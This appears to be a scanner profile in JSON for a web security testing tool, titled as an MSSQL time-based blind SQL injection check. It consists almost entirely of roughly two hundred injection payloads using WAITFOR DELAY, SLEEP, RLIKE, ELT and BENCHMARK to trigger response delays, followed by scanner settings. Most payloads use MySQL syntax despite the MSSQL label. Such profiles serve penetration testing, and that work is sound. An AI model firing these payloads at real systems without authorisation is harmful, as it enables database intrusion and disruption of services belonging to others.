[
  {
    "ProfileName": "BlindSQLi - MSSQL - TimeBased",
    "Name": "",
    "Enabled": false,
    "Scanner": 1,
    "Author": "@egarme",
    "Payloads": [
      "true,;waitfor delay \u00270:0:15\u0027--",
      "true,\u0027;WAITFOR DELAY \u00270:0:15\u0027--",
      "true,);waitfor delay \u00270:0:15\u0027--",
      "true,\u0027;waitfor delay \u00270:0:15\u0027--",
      "true,\";waitfor delay \u00270:0:15\u0027--",
      "true,\u0027);waitfor delay \u00270:0:15\u0027--",
      "true,\");waitfor delay \u00270:0:15\u0027--",
      "true,));waitfor delay \u00270:0:15\u0027--",
      "true,\u0027));waitfor delay \u00270:0:15\u0027--",
      "true,\"));waitfor delay \u00270:0:15\u0027--",
      "true,\") IF (1\u003d1) WAITFOR DELAY \u00270:0:15\u0027--",
      "true,\u0027;%5waitfor%5delay%5\u00270:0:15\u0027%5--%5",
      "true,\u0027 WAITFOR DELAY \u00270:0:15\u0027--",
      "true,\u0027 WAITFOR DELAY \u00270:0:15\u0027",
      "true,or WAITFOR DELAY \u00270:0:15\u0027--",
      "true,or WAITFOR DELAY \u00270:0:15\u0027",
      "true,and WAITFOR DELAY \u00270:0:15\u0027--",
      "true,and WAITFOR DELAY \u00270:0:15\u0027",
      "true,WAITFOR DELAY \u00270:0:15\u0027",
      "true,;WAITFOR DELAY \u00270:0:15\u0027--",
      "true,;WAITFOR DELAY \u00270:0:15\u0027",
      "true,1 WAITFOR DELAY \u00270:0:15\u0027--",
      "true,1 WAITFOR DELAY \u00270:0:15\u0027",
      "true,1 WAITFOR DELAY \u00270:0:15\u0027-- 1337",
      "true,1\u0027 WAITFOR DELAY \u00270:0:15\u0027 AND \u00271337\u0027\u003d\u00271337",
      "true,1\u0027) WAITFOR DELAY \u00270:0:15\u0027 AND (\u00271337\u0027\u003d\u00271337",
      "true,1) WAITFOR DELAY \u00270:0:15\u0027 AND (1337\u003d1337",
      "true,\u0027) WAITFOR DELAY \u00270:0:15\u0027--",
      "true,\" WAITFOR DELAY \u00270:0:15\u0027--",
      "true,\u0027)) WAITFOR DELAY \u00270:0:15\u0027--",
      "true,\u0027))) WAITFOR DELAY \u00270:0:15\u0027--",
      "true,%\u0027 WAITFOR DELAY \u00270:0:15\u0027--",
      "true,\") WAITFOR DELAY \u00270:0:15\u0027--",
      "true,\")) WAITFOR DELAY \u00270:0:15\u0027--",
      "true,\"))) WAITFOR DELAY \u00270:0:15\u0027--",
      "true,1 waitfor delay \u00270:0:15\u0027--",
      "true,1\u0027 waitfor delay \u00270:0:15\u0027--",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (1337\u003d1337",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (\u0027PBiy\u0027\u003d\u0027PBiy",
      "true,) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (1337\u003d1337",
      "true,)) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR ((1337\u003d1337",
      "true,))) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (((1337\u003d1337",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)# 1337",
      "true,) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,1 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,` WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,`) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,`\u003d`1` OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY))|[1",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR (SELECT 3122 FROM (SELECT(SLEEP(15)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR (SELECT 4796 FROM (SELECT(SLEEP(15)))YYYY) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (\"1337\"\u003d\"1337",
      "true,\")) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (((\"1337\"\u003d\"1337",
      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \"1337\"\u003d\"1337",
      "true,\") OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (\"1337\" LIKE \"1337",
      "true,\")) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR (((\"1337\" LIKE \"1337",
      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,\") WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,RLIKE SLEEP(15)--",
      "true,\u0027 RLIKE SLEEP(15)--",
      "true,\u0027 RLIKE SLEEP(15)-- 1337",
      "true,\" RLIKE SLEEP(15)-- 1337",
      "true,\u0027) RLIKE SLEEP(15)-- 1337",
      "true,\u0027) RLIKE SLEEP(15) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) RLIKE SLEEP(15) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) RLIKE SLEEP(15) OR (((\u00271337\u0027\u003d\u00271337",
      "true,) RLIKE SLEEP(15)-- 1337",
      "true,) RLIKE SLEEP(15) OR (1337\u003d1337",
      "true,)) RLIKE SLEEP(15) OR ((1337\u003d1337",
      "true,))) RLIKE SLEEP(15) OR (((1337\u003d1337",
      "true,1 RLIKE SLEEP(15)",
      "true,1 RLIKE SLEEP(15)-- 1337",
      "true,1 RLIKE SLEEP(15)# 1337",
      "true,) WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,1 WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 RLIKE SLEEP(15))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,` WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,`) WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,\u0027 RLIKE SLEEP(15) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) RLIKE SLEEP(15) OR (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) RLIKE SLEEP(15) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) RLIKE SLEEP(15) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 RLIKE SLEEP(15) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 RLIKE SLEEP(15) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") RLIKE SLEEP(15) OR (\"1337\"\u003d\"1337",
      "true,\")) RLIKE SLEEP(15) OR ((\"1337\"\u003d\"1337",
      "true,\"))) RLIKE SLEEP(15) OR (((\"1337\"\u003d\"1337",
      "true,\" RLIKE SLEEP(15) OR \"1337\"\u003d\"1337",
      "true,\") RLIKE SLEEP(15) OR (\"1337\" LIKE \"1337",
      "true,\")) RLIKE SLEEP(15) OR ((\"1337\" LIKE \"1337",
      "true,\"))) RLIKE SLEEP(15) OR (((\"1337\" LIKE \"1337",
      "true,\" RLIKE SLEEP(15) OR \"1337\" LIKE \"1337",
      "true,\u0027 RLIKE SLEEP(15) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,\") WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,\u0027 WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,\" WHERE 1337\u003d1337 RLIKE SLEEP(15)-- 1337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(15))--",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\" OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(15)) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR ELT(1337\u003d1337,SLEEP(15)) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR ELT(1337\u003d1337,SLEEP(15)) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(15)) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(15)) OR (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) OR ELT(1337\u003d1337,SLEEP(15)) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) OR ELT(1337\u003d1337,SLEEP(15)) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,) OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,) OR ELT(1337\u003d1337,SLEEP(15)) OR (1337\u003d1337",
      "true,)) OR ELT(1337\u003d1337,SLEEP(15)) OR ((1337\u003d1337",
      "true,))) OR ELT(1337\u003d1337,SLEEP(15)) OR (((1337\u003d1337",
      "true,1 OR ELT(1337\u003d1337,SLEEP(15))",
      "true,1 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,1 OR ELT(1337\u003d1337,SLEEP(15))# 1337",
      "true,) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,1 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,` WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,`) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,1`\u003d`1` OR ELT(1337\u003d1337,SLEEP(15)) OR `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))|[1",
      "true,%\u0027 OR ELT(1337\u003d1337,SLEEP(15)) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(15)) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR ELT(1337\u003d1337,SLEEP(15)) OR (\"1337\"\u003d\"1337",
      "true,\")) OR ELT(1337\u003d1337,SLEEP(15)) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR ELT(1337\u003d1337,SLEEP(15)) OR (((\"1337\"\u003d\"1337",
      "true,\" OR ELT(1337\u003d1337,SLEEP(15)) OR \"1337\"\u003d\"1337",
      "true,\") OR ELT(1337\u003d1337,SLEEP(15)) OR (\"1337\" LIKE \"1337",
      "true,\")) OR ELT(1337\u003d1337,SLEEP(15)) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR ELT(1337\u003d1337,SLEEP(15)) OR (((\"1337\" LIKE \"1337",
      "true,\" OR ELT(1337\u003d1337,SLEEP(15)) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(15)) OR \u00271337\u0027\u003d\u0027FMTE",
      "true,\u0027) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\") WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\" WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027||(SELECT 0x4c454f67 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))||\u0027",
      "true,\u0027||(SELECT 0x727a5277 FROM DUAL WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))||\u0027",
      "true,\u0027+(SELECT 0x4b6b486c WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))+\u0027",
      "true,||(SELECT 0x57556971 FROM DUAL WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))||",
      "true,||(SELECT 0x67664847 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))||",
      "true,+(SELECT 0x74764164 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15)))+",
      "true,\u0027)) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\")) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\") AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(15))-- 1337",
      "true,\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))--",
      "true,\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))-- 1337",
      "true,\" OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) OR \u003dBENCHMARK(15000000,MD5(0x774c5341))--",
      "true,\u0027) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (\"1337\"\u003d\"1337",
      "true,\")) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (((\"1337\"\u003d\"1337",
      "true,\" OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR \"1337\"\u003d\"1337",
      "true,\") OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (\"1337\" LIKE \"1337",
      "true,\")) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR 1337\u003dBENCHMARK(15000000,MD5(0x774c5341)) OR (((\"1337\" LIKE \"1337",
      "true,\" OR 1337\u003dBENCHMARK(15000000,MD5(0x576e7a57)) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR 1337\u003dBENCHMARK(15000000,MD5(0x576e7a57)) OR \u00271337\u0027\u003d\u00271337"
    ],
    "Encoder": [
      "URL-encode key characters"
    ],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [],
    "Tags": [
      "SQLi",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "14",
    "TimeOut2": "20",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 5,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "BlindSQLi - MSSQL - TimeBased",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]